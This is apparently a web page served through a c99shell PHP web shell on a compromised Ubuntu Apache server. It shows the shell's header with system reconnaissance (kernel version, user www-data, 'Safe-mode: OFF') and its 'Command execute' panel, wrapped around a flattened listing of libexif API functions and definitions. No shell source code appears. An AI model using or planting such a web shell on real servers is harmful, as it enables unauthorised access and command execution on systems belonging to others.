Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/share/doc/libexif-doc/libexif-api.html/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
exif-loader.h void exif_loader_get_buf(ExifLoader *loader, const unsigned char **buf, unsigned int *buf_size) Return the raw data read by the loader. Definition: exif-loader.c:407 Defines the ExifLoader type. ExifLoader * exif_loader_new(void) Allocate a new ExifLoader. Definition: exif-loader.c:317 ExifMem * exif_mem_new_default(void) Create a new ExifMem with default values for your convenience. Definition: exif-mem.c:95 ExifLoader * exif_loader_new_mem(ExifMem *mem) Allocate a new ExifLoader using the specified memory allocator. Definition: exif-loader.c:328 ExifData * exif_data_new_mem(ExifMem *) Allocate a new ExifData using the given memory allocator. Definition: exif-data.c:106 unsigned char exif_loader_write(ExifLoader *loader, unsigned char *buf, unsigned int sz) Load a buffer into the ExifLoader from a memory buffer. Definition: exif-loader.c:153 void exif_data_load_data(ExifData *data, const unsigned char *d, unsigned int size) Load the ExifData structure from the raw JPEG or EXIF data in the given memory buffer. Definition: exif-data.c:829 EXIF data manipulation functions and types. void exif_loader_unref(ExifLoader *loader) Decrease the refcount of the ExifLoader. Definition: exif-loader.c:369 void exif_data_log(ExifData *data, ExifLog *log) Set the log message object for all IFDs. Definition: exif-data.c:1196 void exif_loader_ref(ExifLoader *loader) Increase the refcount of the ExifLoader. Definition: exif-loader.c:347 void exif_loader_reset(ExifLoader *loader) Free any data previously loaded and reset the ExifLoader to its newly-initialized state. Definition: exif-loader.c:378 Log message infrastructure. struct _ExifLoader ExifLoader Data used by the loader interface. Definition: exif-loader.h:35 ExifData * exif_loader_get_data(ExifLoader *loader) Create an ExifData from the data in the loader. Definition: exif-loader.c:391 Define the ExifMem data type and the associated functions. ExifMem defines the memory management func... Defines the ExifData type and the associated functions. void exif_loader_write_file(ExifLoader *loader, const char *fname) Load a file into the given ExifLoader from the filesystem. Definition: exif-loader.c:107 void exif_loader_log(ExifLoader *loader, ExifLog *log) Set the log message object used by this ExifLoader. Definition: exif-loader.c:427 |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0105 ]-- |